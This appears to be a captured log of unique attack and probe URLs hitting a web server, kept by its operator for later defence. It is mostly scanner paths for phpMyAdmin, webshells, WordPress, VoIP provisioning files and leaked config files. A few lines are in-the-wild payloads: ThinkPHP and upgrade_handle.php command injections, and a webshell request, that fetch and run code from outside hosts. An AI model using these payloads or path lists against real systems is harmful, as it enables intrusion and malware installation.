Comprehensive list of attack/probe URL's

attack_urls.txt

#This was done by some tool, don't know which one, and our custom built app captured theese URL's, after filtering
#for unique URL's, here is list of URL's in original form, I will later try to create some protection
/3B1728A10D221805D2CABE58B095D353.php
/manager/html
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
/mysql/mysqlmanager/index.php
/mysql/sqlmanager/index.php
/mysql/dbadmin/index.php
/mysql/admin/index.php
/phpmy/index.php
/phppma/index.php
/shopdb/index.php
/program/index.php
/phpMyAdmins/index.php
/phpMydmin/index.php
/pwd/index.php
/phpMyAdmin123/index.php
/MyAdmin/index.php
/s/index.php
/phpMyadmi/index.php
/shaAdmin/index.php
/phpMyAdm1n/index.php
/phpMyAdmin+++---/index.php
/phpMyAdmin__/index.php
/phpMyAbmin/index.php
/phpMyAdmin/phpMyAdmin/index.php
/phpma/index.php
/typo3/phpmyadmin/index.php
/claroline/phpMyAdmin/index.php
/pma-old/index.php
/phpMyAdmin.old/index.php
/phpMyAdminold/index.php
/phpmyadmin-old/index.php
/tools/phpMyAdmin/index.php
/www/phpMyAdmin/index.php
/xampp/phpmyadmin/index.php
/myadmin2/index.php
/phpMyAdmin-4.4.0/index.php
/phpmyadmin2/index.php
/phpmyadmin1/index.php
/phpmyadmin0/index.php
/phpAdmin/index.php
/mysql_admin/index.php
/mysql-admin/index.php
/mysqladmin/index.php
/admin/phpmyadmin2/index.php
/admin/phpMyAdmin/index.php
/admin/mysql2/index.php
/admin/mysql/index.php
/admin/PMA/index.php
/web/phpMyAdmin/index.php
/dbadmin/index.php
/db/index.php
/admin/index.php
/mysql/index.php
/pmamy2/index.php
/pmamy/index.php
/PMA/index.php
/pmd/index.php
/phpMyAdmin/index.php
/zuoshss.php
/zuoss.php
/zuos.php
/ou2.php
/1hou.php
/ceshi.php
/tomcat.php
/zshmindex.php
/zuoindex.php
/linuxse.php
/xz.php
/miao.php
/tiandi.php
/help.php
/app.php
/sean.php
/python.php
/9510.php
/phpinfi.php
/3.php
/h1.php
/aaaa.php
/post.php
/1213.php
/qq.php
/infoo.php
/ip.php
/ak.php
/12.php
/aw.php
/ssaa.php
/wanan.php
/wan.php
/min.php
/yumo.php
/xx.php
/mz.php
/56.php
/q.php
/l8.php
/l7.php
/l6.php
/system.php
/bak.php
/cmd.php
/aotu7.php
/aotu.php
/zuo.php
/zuoshou.php
/hm.php
/webslee.php
/yao.php
/xiao.php
/ak48.php
/ak47.php
/feixiang.php
/weixiao.php
/phpStudy.php
/lindex.php
/conflg.php
/xshell.php
/wshell.php
/mx.php
/db_dataml.php
/m.php?pbid=open
/wp-admins.php
/db__.init.php
/db_session.init.php
/db.init.php
/qaq.php
/sheep.php
/w.php
/s.php
/wc.php
/9678.php
/wuwu11.php
/payload.php
/undx.php
/rxr.php
/cacti/plugins/weathermap/editor.php
/plugins/weathermap/editor.php
/phpMyAdmin/scripts/db___.init.php
/phpMyAdmin/scripts/setup.php
/scripts/setup.php
/appserv.php
/knal.php
/cmdd.php
/cmv.php
/uploader.php
/lol.php
/muhstik-dpr.php
/muhstiks.php
/muhstik2.php
/muhstik.php
/wp-config.php
/text.php
/wpc.php
/lala-dpr.php
/lala.php
/desktop.ini.php
/htdocs.php
/shell.php
/x.php
/hell.php
/log.php
/license.php
/logon.php
/db_cts.php
/_query.php
/java.php
/App6d98e343.php
/webdav/
/vtigercrm/vtigerservice.php
/recordings/
/a2billing/customer/templates/default/footer.tpl
/js/mage/cookies.js
/phpMyAdmina/index.php
/phpMyAdmion/index.php
/v/index.php
/phpMyadmin_bak/index.php
/PMA2/index.php
/lanyecn.php
/errors.php
/1111.php
/1q.php
/mm.php
/cadre.php
/51.php
/1ndex.php
/cnm.php
/paylog.php
/fb.php
/test123.php
/up.php
/aaaaaa1.php
/info1.php
/index1.php
/api.php
/cn.php
/lx.php
/indexa.php
/zxc2.php
/zxc1.php
/zxc0.php
/1.php
/coon.php
/MCLi.php
/chaoda.php
/www.php
/ljb.php
/guai.php
/xxxx.php
/Updata.php
/mysql.php
/no.php
/meng.php
/lucky.php
/liangchen.php
/Administrator.php
/aaa.php
/cere.php
/super.php
/neko.php
/lanke.php
/cc.php
/linux1.php
/linux.php
/win1.php
/win.php
/php.php
/lost.php
/qq5262.php
/j.php
/xiaohei.php
/xiaoyu.php
/xiaomo.php
/hacly.php
/db.php
/cxfm666.php
/angge.php
/fack.php
/data.php
/xiaomar.php
/xiaomae.php
/xiaoma.php
/7.php
/z.php
/yj.php
/wb.php
/aa.php
/uu.php
/toor.php
/zzk.php
/htfr.php
/infos.php
/.php
/qwqw.php
/qwq.php
/777.php
/666.php
/diy.php
/HX.php
/123.php
/conf.php
/m.php
/p.php
/2.php
/xp.php
/admn.php
/hello.php
/xiaodai.php
/s1.php
/ldw.php
/repeat.php
/general.php
/fusheng.php
/5201314.php
/51314.php
/ruyi.php
/pma.php
/erwa.php
/okokok.php
/godkey.php
/nuoxi.php
/dexgp.php
/92.php
/xxx.php
/Ss.php
/qa.php
/hack.php
/ver.php
/confg.php
/conf1g.php
/ppx.php
/sha.php
/qaz.php
/core.php
/phpini.php
/mazi.php
/sss.php
/uuu.php
/u.php
/wcp.php
/caonma.php
/qw.php
/she.php
/boots.php
/default.php
/qwe.php
/hh.php
/cainiao.php
/pe.php
/defect.php
/db_desql.php
/xw1.php
/xw.php
/wpo.php
/pmd_online.php
/help-e.php
/db_pma.php
/HNAP1/
/xmlrpc.php
/Apple6D98E343.php
/mahua/v/20190212/8dfcb2192a5052e5a152b9d8115201af_24f3fa0cbc00474fab1610181191b09c_0.m3u8
/robots.txt
/admin/users/profile
/NZPTZ/LVUXZ/VfXbZ/LfKLZ/YhVSZ/LmkmZ/VkRpZ/MakKZ/URjaZ/
/goip/
/admin​
//vtigercrm/vtigerservice.php
//recordings/
/user/register
/wp-login.php?action=register
//a2billing/customer/templates/default/footer.tpl
/projects
/mysql/mysqlmanager/index.php?lang=en
/mysql/sqlmanager/index.php?lang=en
/mysql/dbadmin/index.php?lang=en
/mysql/admin/index.php?lang=en
/phpMyadmin/index.php?lang=en
/acadmin.php
/debugkit/toolbaraccess/history_state/4
/debugkit/toolbaraccess/history_state/3
/debugkit/toolbaraccess/history_state/2
/debugkit/toolbaraccess/history_state/1
/administrator/
/css/cake.generic.css
/ua/Thumbr.php?ftp%3A%2F%2Fet%3Aet%40et_fea_kpi_ua%2FThumbr_php%3F=
/wp-admin/setup-config.php?step=1
/www.shiying123.com:443
/.well-known/security.txt
/css/bootstrap-responsive.css
/css/bootstrap.css
/elrekt.php
/TP/html/public/index.php
/public/index.php
/html/public/index.php
/thinkphp/html/public/index.php
/TP/index.php
/TP/public/index.php
/www.voanews.com:443
/english/
/cn.bing.com:443
/www.baidu.com:443
/wp-login.php
/reply.php?q=eyJpcCI6IjY3LjIyNy4xNTIuMTA5IiwicG9ydCI6IjgwIiwibm9kbnMiOnRydWUsInR5cGUiOiJXRUIiLCJoYXNoIjoiNTFkMmEwMjE4ZDBjYjkxMGQxMDdhMmQ4NGYyOTY1ZDAifQ%3D%3D
/phpmyadmin2019/index.php?lang=en
/phpmyadmin2018/index.php?lang=en
/phpmyadmin2017/index.php?lang=en
/phpmyadmin2016/index.php?lang=en
/phpmyadmin2015/index.php?lang=en
/phpmyadmin2014/index.php?lang=en
/phpmyadmin2013/index.php?lang=en
/phpmyadmin2012/index.php?lang=en
/phpmyadmin2011/index.php?lang=en
/pma2019/index.php?lang=en
/pma2018/index.php?lang=en
/pma2017/index.php?lang=en
/pma2016/index.php?lang=en
/pma2015/index.php?lang=en
/pma2014/index.php?lang=en
/pma2013/index.php?lang=en
/pma2012/index.php?lang=en
/pma2011/index.php?lang=en
/php-my-admin/index.php?lang=en
/phpMyAdmin-3/index.php?lang=en
/phpMyAdmin4/index.php?lang=en
/phpMyAdmin3/index.php?lang=en
/phpMyAdmin2/index.php?lang=en
/administrator/admin/index.php?lang=en
/administrator/PMA/index.php?lang=en
/administrator/web/index.php?lang=en
/administrator/db/index.php?lang=en
/administrator/phpMyAdmin/index.php?lang=en
/db/phpMyAdmin-3/index.php?lang=en
/db/phpMyAdmin3/index.php?lang=en
/db/db-admin/index.php?lang=en
/db/dbadmin/index.php?lang=en
/db/webdb/index.php?lang=en
/db/websql/index.php?lang=en
/db/dbweb/index.php?lang=en
/db/webadmin/index.php?lang=en
/db/myadmin/index.php?lang=en
/sql/phpMyAdmin/index.php?lang=en
/sql/phpMyAdmin2/index.php?lang=en
/sql/sql-admin/index.php?lang=en
/sql/sqladmin/index.php?lang=en
/sql/webdb/index.php?lang=en
/sql/websql/index.php?lang=en
/sql/sqlweb/index.php?lang=en
/sql/webadmin/index.php?lang=en
/sql/myadmin/index.php?lang=en
/sql/sql/index.php?lang=en
/sql/phpmy-admin/index.php?lang=en
/sql/php-myadmin/index.php?lang=en
/sql/phpmanager/index.php?lang=en
/mysql/pMA/index.php?lang=en
/mysql/web/index.php?lang=en
/mysql/db/index.php?lang=en
/admin/pMA/index.php?lang=en
/admin/web/index.php?lang=en
/admin/db/index.php?lang=en
/admin/sqladmin/index.php?lang=en
/admin/sysadmin/index.php?lang=en
/admin/phpMyAdmin/index.php?lang=en
/mysql-admin/index.php?lang=en
/mysqladmin/index.php?lang=en
/phpmy-admin/index.php?lang=en
/php-myadmin/index.php?lang=en
/mysqlmanager/index.php?lang=en
/sqlmanager/index.php?lang=en
/db/phpMyAdmin/index.php?lang=en
/database/index.php?lang=en
/mysql/index.php?lang=en
/admin/index.php?lang=en
/db/index.php?lang=en
/pma/index.php?lang=en
/dbadmin/index.php?lang=en
/program/index.php?lang=en
/MyAdmin/index.php?lang=en
/shopdb/index.php?lang=en
/phppma/index.php?lang=en
/phpmy/index.php?lang=en
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
/2phpmyadmin/index.php?lang=en
/webcapture.jpg?command=snap&channel=1
/20C8F75E.php
/Jwlsjd_baaqifg.php
/upgrade_handle.php?cmd=getupgradinginfo
/HNAP1
/js/vendors.php
/img/cake.icon.gif
/nmaplowercheck1550988322
/home
/index
/robots
/scripts/WPnBr.dll
/sdk
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/
/ts/in.cgi?open2=
/nmaplowercheck1550988323
/evox/about
/nmaplowercheck1550988324
/nmaplowercheck1550988326
/echo.php
/54.252.131.155:443
/reply.php?q=eyJpcCI6Ijk0LjI0Ny4yMDAuMzIiLCJwb3J0IjoiODAiLCJub2RucyI6dHJ1ZSwidHlwZSI6IldFQiIsImhhc2giOiI2MTAxNjI2MTQyOWRlOTdjZTA0OTVjOTM3OTdkMDg1YyJ9
/reply.php
/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27%3Bcd+%2Ftmp%3B+wget+http%3A%2F%2F198.98.54.147%2Ff+%3B+chmod+777+f%3B+sh+f%3B%27
/public/index.php?s=%2Findex%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B0%5D=wget+http%3A%2F%2F176.162.141.99%2Fphpmyadmin%2Fctrl.php%3Fadd_ip
/mysql-admin/
/mysqladmin/
/webdb/
/websql/
/sqlweb/
/webadmin/
/phpmy-admin/
/php-myadmin/
/phpmanager/
/pma2005/
/p/m/a/
/mysqlmanager/
/sqlmanager/
/phpMyAdmin-2.8.2/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.2.3/
/php-my-admin/
/phpMyAdmin-2/
/phpMyAdmin2/
/openserver/phpmyadmin/
/myadmin/
/mysql/
/dbadmin/
/pma/
/phpMyAdmin/
/agSearch/SQlite/main.php
/SQLiteManager-1.2.4/main.php
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php
/main.php
/SQlite/main.php
/SQLiteManager/main.php
/script
/hudson/script
/ncsi.txt
/[email protected]/Thumbr.php
/yshqcdm9xaqpbqlh
/.well-known/assetlinks.json
/CHANGELOG.txt
/api/ip.php
/cfg/y000000000004.cfg
/cfg/000000000000.cfg
/cfg/y000000000000.cfg
/y000000000004.cfg
/cfg/sip.cfg
/y000000000000.cfg
/sip.cfg
/000000000000.cfg
/or.fr/fr/r57.txt
/testclient.php
//phpMyAdmin-2.10.2.0/scripts/setup.php
//phpMyAdmin-2.10.1.0/scripts/setup.php
//phpMyAdmin-2.10.0/scripts/setup.php
//phpMyAdmin-2.10.0.2/scripts/setup.php
//phpMyAdmin-2.10.0.1/scripts/setup.php
//phpMyAdmin-2.10.0.0/scripts/setup.php
//phpmyadmin/scripts/setup.php
//php/phpmyadmin/scripts/setup.php
//forum/phpmyadmin/scripts/setup.php
//cpphpmyadmin/scripts/setup.php
//cpanelphpmyadmin/scripts/setup.php
//blog/phpmyadmin/scripts/setup.php
//apache-default/phpmyadmin/scripts/setup.php
//administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php
//_phpmyadmin/scripts/setup.php
//phpMyAdmin-2/scripts/setup.php
//websql/scripts/setup.php
//php-my-admin/scripts/setup.php
//web/scripts/setup.php
//xampp/phpmyadmin/scripts/setup.php
//web/phpMyAdmin/scripts/setup.php
//pma/scripts/setup.php
//phpadmin/scripts/setup.php
//typo3/phpmyadmin/scripts/setup.php
//mysqladmin/scripts/setup.php
//mysql/scripts/setup.php
//myadmin/scripts/setup.php
//dbadmin/scripts/setup.php
//db/scripts/setup.php
//admin/phpmyadmin/scripts/setup.php
//admin/pma/scripts/setup.php
//admin/scripts/setup.php
//scripts/setup.php
/muieblackcat
/FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http%3A%2F%2Fa46.bulehero.in%2Fdownload.exe
/FxCodeShell.jsp/
/FxCodeShell.jsp::$DATA
/FxCodeShell.jsp%20
/horde3/imp/test.php
/horde/imp/test.php
/imp/test.php
/admin/database_logger/Users
/old/wp-login.php
/api/v1/pods
/redirect.php
/wordpress/wp-login.php
/nmaplowercheck1550272188
/ccvv
/a2billing/admin/Public/PP_error.php?c=accessdenied
/index.action
/images/
/admin.php
/wp-admin/
/administrator/index.php
//phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php
//phpMyAdmin-2.11.11.3/scripts/setup.php
//phpMyAdmin-2.11.11/scripts/setup.php
//phpmyadmin7/scripts/setup.php
//phpmyadmin6/scripts/setup.php
//phpmyadmin5/scripts/setup.php
//phpmyadmin4/scripts/setup.php
//phpmyadmin3/scripts/setup.php
//phpmyadmin2/scripts/setup.php
/wp/wp-login.php
/blog/wp-login.php
/admin/workers
/nmaplowercheck1549867276
/bitrix/admin/
/wp-admin/install.php
/admin/index.php?route=common%2Flogin
/te3/signup.php
/ads.txt
/about.php
/ws/v1/cluster/apps/new-application
/z/style.css
/api/v1
/ftpsync.settings
/deployment-config.json
/.vscode/settings.json
/.vscode/sftp.json
/.vscode/ftp-sync.json
/.remote-sync.json
/.ftpconfig
/sftp-config.json
/E93B5E08AB90FDF0AE1818FA3D5638FE.php
/cms/wp-includes/wlwmanifest.xml
/site/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/blog/wp-includes/wlwmanifest.xml
/xmlrpc.php?rsd=
/wp-includes/wlwmanifest.xml
/cmx.php
/info.php
/dns/style.css
/autoprpvisioning/cisco/spa/spa122.xml
/autoprpvision/cisco/spa/spa122.xml
/autoprpv/cisco/spa/spa122.xml
/autoprovisioning/cisco/spa/spa122.xml
/autoprovision/cisco/spa/spa122.xml
/autoprov/cisco/spa/spa122.xml
/phones/cisco/spa/spa122.xml
/phone/cisco/spa/spa122.xml
/configs/cisco/spa/spa122.xml
/config/cisco/spa/spa122.xml
/conf/cisco/spa/spa122.xml
/cfg/cisco/spa/spa122.xml
/provisioning/cisco/spa/spa122.xml
/provision/cisco/spa/spa122.xml
/prov/cisco/spa/spa122.xml
/pv/cisco/spa/spa122.xml
/p/cisco/spa/spa122.xml
/autoprpvisioning/cisco/spa122.xml
/autoprpvision/cisco/spa122.xml
/autoprpv/cisco/spa122.xml
/autoprovisioning/cisco/spa122.xml
/autoprovision/cisco/spa122.xml
/autoprov/cisco/spa122.xml
/phones/cisco/spa122.xml
/phone/cisco/spa122.xml
/configs/cisco/spa122.xml
/config/cisco/spa122.xml
/conf/cisco/spa122.xml
/cfg/cisco/spa122.xml
/provisioning/cisco/spa122.xml
/provision/cisco/spa122.xml
/prov/cisco/spa122.xml
/pv/cisco/spa122.xml
/p/cisco/spa122.xml
/autoprpvisioning/linksys/spa122.xml
/autoprpvision/linksys/spa122.xml
/autoprpv/linksys/spa122.xml
/autoprovisioning/linksys/spa122.xml
/autoprovision/linksys/spa122.xml
/autoprov/linksys/spa122.xml
/phones/linksys/spa122.xml
/phone/linksys/spa122.xml
/configs/linksys/spa122.xml
/config/linksys/spa122.xml
/conf/linksys/spa122.xml
/cfg/linksys/spa122.xml
/provisioning/linksys/spa122.xml
/provision/linksys/spa122.xml
/prov/linksys/spa122.xml
/pv/linksys/spa122.xml
/p/linksys/spa122.xml
/autoprpvisioning/spa/spa122.xml
/autoprpvision/spa/spa122.xml
/autoprpv/spa/spa122.xml
/autoprovisioning/spa/spa122.xml
/autoprovision/spa/spa122.xml
/autoprov/spa/spa122.xml
/phones/spa/spa122.xml
/phone/spa/spa122.xml
/configs/spa/spa122.xml
/config/spa/spa122.xml
/conf/spa/spa122.xml
/cfg/spa/spa122.xml
/provisioning/spa/spa122.xml
/provision/spa/spa122.xml
/prov/spa/spa122.xml
/pv/spa/spa122.xml
/p/spa/spa122.xml
/autoprpvisioning/spa122.xml
/autoprpvision/spa122.xml
/autoprpv/spa122.xml
/autoprovisioning/spa122.xml
/autoprovision/spa122.xml
/autoprov/spa122.xml
/phones/spa122.xml
/phone/spa122.xml
/configs/spa122.xml
/config/spa122.xml
/conf/spa122.xml
/cfg/spa122.xml
/provisioning/spa122.xml
/provision/spa122.xml
/prov/spa122.xml
/pv/spa122.xml
/p/spa122.xml
/cisco/spa/spa122.xml
/cisco/spa122.xml
/linksys/spa122.xml
/spa/spa122.xml
/spa122.xml
/autoprpvisioning/cisco/spa/spa112.xml
/autoprpvision/cisco/spa/spa112.xml
/autoprpv/cisco/spa/spa112.xml
/autoprovisioning/cisco/spa/spa112.xml
/autoprovision/cisco/spa/spa112.xml
/autoprov/cisco/spa/spa112.xml
/phones/cisco/spa/spa112.xml
/phone/cisco/spa/spa112.xml
/configs/cisco/spa/spa112.xml
/config/cisco/spa/spa112.xml
/conf/cisco/spa/spa112.xml
/cfg/cisco/spa/spa112.xml
/provisioning/cisco/spa/spa112.xml
/provision/cisco/spa/spa112.xml
/prov/cisco/spa/spa112.xml
/pv/cisco/spa/spa112.xml
/p/cisco/spa/spa112.xml
/autoprpvisioning/cisco/spa112.xml
/autoprpvision/cisco/spa112.xml
/autoprpv/cisco/spa112.xml
/autoprovisioning/cisco/spa112.xml
/autoprovision/cisco/spa112.xml
/autoprov/cisco/spa112.xml
/phones/cisco/spa112.xml
/phone/cisco/spa112.xml
/configs/cisco/spa112.xml
/config/cisco/spa112.xml
/conf/cisco/spa112.xml
/cfg/cisco/spa112.xml
/provisioning/cisco/spa112.xml
/provision/cisco/spa112.xml
/prov/cisco/spa112.xml
/pv/cisco/spa112.xml
/p/cisco/spa112.xml
/autoprpvisioning/linksys/spa112.xml
/autoprpvision/linksys/spa112.xml
/autoprpv/linksys/spa112.xml
/autoprovisioning/linksys/spa112.xml
/autoprovision/linksys/spa112.xml
/autoprov/linksys/spa112.xml
/phones/linksys/spa112.xml
/phone/linksys/spa112.xml
/configs/linksys/spa112.xml
/config/linksys/spa112.xml
/conf/linksys/spa112.xml
/cfg/linksys/spa112.xml
/provisioning/linksys/spa112.xml
/provision/linksys/spa112.xml
/prov/linksys/spa112.xml
/pv/linksys/spa112.xml
/p/linksys/spa112.xml
/autoprpvisioning/spa/spa112.xml
/autoprpvision/spa/spa112.xml
/autoprpv/spa/spa112.xml
/autoprovisioning/spa/spa112.xml
/autoprovision/spa/spa112.xml
/autoprov/spa/spa112.xml
/phones/spa/spa112.xml
/phone/spa/spa112.xml
/configs/spa/spa112.xml
/config/spa/spa112.xml
/conf/spa/spa112.xml
/cfg/spa/spa112.xml
/provisioning/spa/spa112.xml
/provision/spa/spa112.xml
/prov/spa/spa112.xml
/pv/spa/spa112.xml
/p/spa/spa112.xml
/autoprpvisioning/spa112.xml
/autoprpvision/spa112.xml
/autoprpv/spa112.xml
/autoprovisioning/spa112.xml
/autoprovision/spa112.xml
/autoprov/spa112.xml
/phones/spa112.xml
/phone/spa112.xml
/configs/spa112.xml
/config/spa112.xml
/conf/spa112.xml
/cfg/spa112.xml
/provisioning/spa112.xml
/provision/spa112.xml
/prov/spa112.xml
/pv/spa112.xml
/p/spa112.xml
/cisco/spa/spa112.xml
/cisco/spa112.xml
/linksys/spa112.xml
/spa/spa112.xml
/spa112.xml
/autoprpvisioning/cisco/spa/spa122.cfg
/autoprpvision/cisco/spa/spa122.cfg
/autoprpv/cisco/spa/spa122.cfg
/autoprovisioning/cisco/spa/spa122.cfg
/autoprovision/cisco/spa/spa122.cfg
/autoprov/cisco/spa/spa122.cfg
/phones/cisco/spa/spa122.cfg
/phone/cisco/spa/spa122.cfg
/configs/cisco/spa/spa122.cfg
/config/cisco/spa/spa122.cfg
/conf/cisco/spa/spa122.cfg
/cfg/cisco/spa/spa122.cfg
/provisioning/cisco/spa/spa122.cfg
/provision/cisco/spa/spa122.cfg
/prov/cisco/spa/spa122.cfg
/pv/cisco/spa/spa122.cfg
/p/cisco/spa/spa122.cfg
/autoprpvisioning/cisco/spa122.cfg
/autoprpvision/cisco/spa122.cfg
/autoprpv/cisco/spa122.cfg
/autoprovisioning/cisco/spa122.cfg
/autoprovision/cisco/spa122.cfg
/autoprov/cisco/spa122.cfg
/phones/cisco/spa122.cfg
/phone/cisco/spa122.cfg
/configs/cisco/spa122.cfg
/config/cisco/spa122.cfg
/conf/cisco/spa122.cfg
/cfg/cisco/spa122.cfg
/provisioning/cisco/spa122.cfg
/provision/cisco/spa122.cfg
/prov/cisco/spa122.cfg
/pv/cisco/spa122.cfg
/p/cisco/spa122.cfg
/autoprpvisioning/linksys/spa122.cfg
/autoprpvision/linksys/spa122.cfg
/autoprpv/linksys/spa122.cfg
/autoprovisioning/linksys/spa122.cfg
/autoprovision/linksys/spa122.cfg
/autoprov/linksys/spa122.cfg
/phones/linksys/spa122.cfg
/phone/linksys/spa122.cfg
/configs/linksys/spa122.cfg
/config/linksys/spa122.cfg
/conf/linksys/spa122.cfg
/cfg/linksys/spa122.cfg
/provisioning/linksys/spa122.cfg
/provision/linksys/spa122.cfg
/prov/linksys/spa122.cfg
/pv/linksys/spa122.cfg
/p/linksys/spa122.cfg
/autoprpvisioning/spa/spa122.cfg
/autoprpvision/spa/spa122.cfg
/autoprpv/spa/spa122.cfg
/autoprovisioning/spa/spa122.cfg
/autoprovision/spa/spa122.cfg
/autoprov/spa/spa122.cfg
/phones/spa/spa122.cfg
/phone/spa/spa122.cfg
/configs/spa/spa122.cfg
/config/spa/spa122.cfg
/conf/spa/spa122.cfg
/cfg/spa/spa122.cfg
/provisioning/spa/spa122.cfg
/provision/spa/spa122.cfg
/prov/spa/spa122.cfg
/pv/spa/spa122.cfg
/p/spa/spa122.cfg
/autoprpvisioning/spa122.cfg
/autoprpvision/spa122.cfg
/autoprpv/spa122.cfg
/autoprovisioning/spa122.cfg
/autoprovision/spa122.cfg
/autoprov/spa122.cfg
/phones/spa122.cfg
/phone/spa122.cfg
/configs/spa122.cfg
/config/spa122.cfg
/conf/spa122.cfg
/cfg/spa122.cfg
/provisioning/spa122.cfg
/provision/spa122.cfg
/prov/spa122.cfg
/pv/spa122.cfg
/p/spa122.cfg
/cisco/spa/spa122.cfg
/cisco/spa122.cfg
/linksys/spa122.cfg
/spa/spa122.cfg
/spa122.cfg
/autoprpvisioning/cisco/spa/spa112.cfg
/autoprpvision/cisco/spa/spa112.cfg
/autoprpv/cisco/spa/spa112.cfg
/autoprovisioning/cisco/spa/spa112.cfg
/autoprovision/cisco/spa/spa112.cfg
/autoprov/cisco/spa/spa112.cfg
/phones/cisco/spa/spa112.cfg
/phone/cisco/spa/spa112.cfg
/configs/cisco/spa/spa112.cfg
/config/cisco/spa/spa112.cfg
/conf/cisco/spa/spa112.cfg
/cfg/cisco/spa/spa112.cfg
/provisioning/cisco/spa/spa112.cfg
/provision/cisco/spa/spa112.cfg
/prov/cisco/spa/spa112.cfg
/pv/cisco/spa/spa112.cfg
/p/cisco/spa/spa112.cfg
/autoprpvisioning/cisco/spa112.cfg
/autoprpvision/cisco/spa112.cfg
/autoprpv/cisco/spa112.cfg
/autoprovisioning/cisco/spa112.cfg
/autoprovision/cisco/spa112.cfg
/autoprov/cisco/spa112.cfg
/phones/cisco/spa112.cfg
/phone/cisco/spa112.cfg
/configs/cisco/spa112.cfg
/config/cisco/spa112.cfg
/conf/cisco/spa112.cfg
/cfg/cisco/spa112.cfg
/provisioning/cisco/spa112.cfg
/provision/cisco/spa112.cfg
/prov/cisco/spa112.cfg
/pv/cisco/spa112.cfg
/p/cisco/spa112.cfg
/autoprpvisioning/linksys/spa112.cfg
/autoprpvision/linksys/spa112.cfg
/autoprpv/linksys/spa112.cfg
/autoprovisioning/linksys/spa112.cfg
/autoprovision/linksys/spa112.cfg
/autoprov/linksys/spa112.cfg
/phones/linksys/spa112.cfg
/phone/linksys/spa112.cfg
/configs/linksys/spa112.cfg
/config/linksys/spa112.cfg
/conf/linksys/spa112.cfg
/cfg/linksys/spa112.cfg
/provisioning/linksys/spa112.cfg
/provision/linksys/spa112.cfg
/prov/linksys/spa112.cfg
/pv/linksys/spa112.cfg
/p/linksys/spa112.cfg
/autoprpvisioning/spa/spa112.cfg
/autoprpvision/spa/spa112.cfg
/autoprpv/spa/spa112.cfg
/autoprovisioning/spa/spa112.cfg
/autoprovision/spa/spa112.cfg
/autoprov/spa/spa112.cfg
/phones/spa/spa112.cfg
/phone/spa/spa112.cfg
/configs/spa/spa112.cfg
/config/spa/spa112.cfg
/conf/spa/spa112.cfg
/cfg/spa/spa112.cfg
/provisioning/spa/spa112.cfg
/provision/spa/spa112.cfg
/prov/spa/spa112.cfg
/pv/spa/spa112.cfg
/p/spa/spa112.cfg
/autoprpvisioning/spa112.cfg
/autoprpvision/spa112.cfg
/autoprpv/spa112.cfg
/autoprovisioning/spa112.cfg
/autoprovision/spa112.cfg
/autoprov/spa112.cfg
/phones/spa112.cfg
/phone/spa112.cfg
/configs/spa112.cfg
/config/spa112.cfg
/conf/spa112.cfg
/cfg/spa112.cfg
/provisioning/spa112.cfg
/provision/spa112.cfg
/prov/spa112.cfg
/pv/spa112.cfg
/p/spa112.cfg
/cisco/spa/spa112.cfg
/cisco/spa112.cfg
/linksys/spa112.cfg
/spa/spa112.cfg
/spa112.cfg
/yealink/WebItemsLevel.cfg
/autoprpvisioning/WebItemsLevel.cfg
/autoprpvision/WebItemsLevel.cfg
/autoprpv/WebItemsLevel.cfg
/autoprovisioning/WebItemsLevel.cfg
/autoprovision/WebItemsLevel.cfg
/autoprov/WebItemsLevel.cfg
/phones/WebItemsLevel.cfg
/phone/WebItemsLevel.cfg
/configs/WebItemsLevel.cfg
/config/WebItemsLevel.cfg
/conf/WebItemsLevel.cfg
/cfg/WebItemsLevel.cfg
/provisioning/WebItemsLevel.cfg
/provision/WebItemsLevel.cfg
/prov/WebItemsLevel.cfg
/pv/WebItemsLevel.cfg
/p/WebItemsLevel.cfg
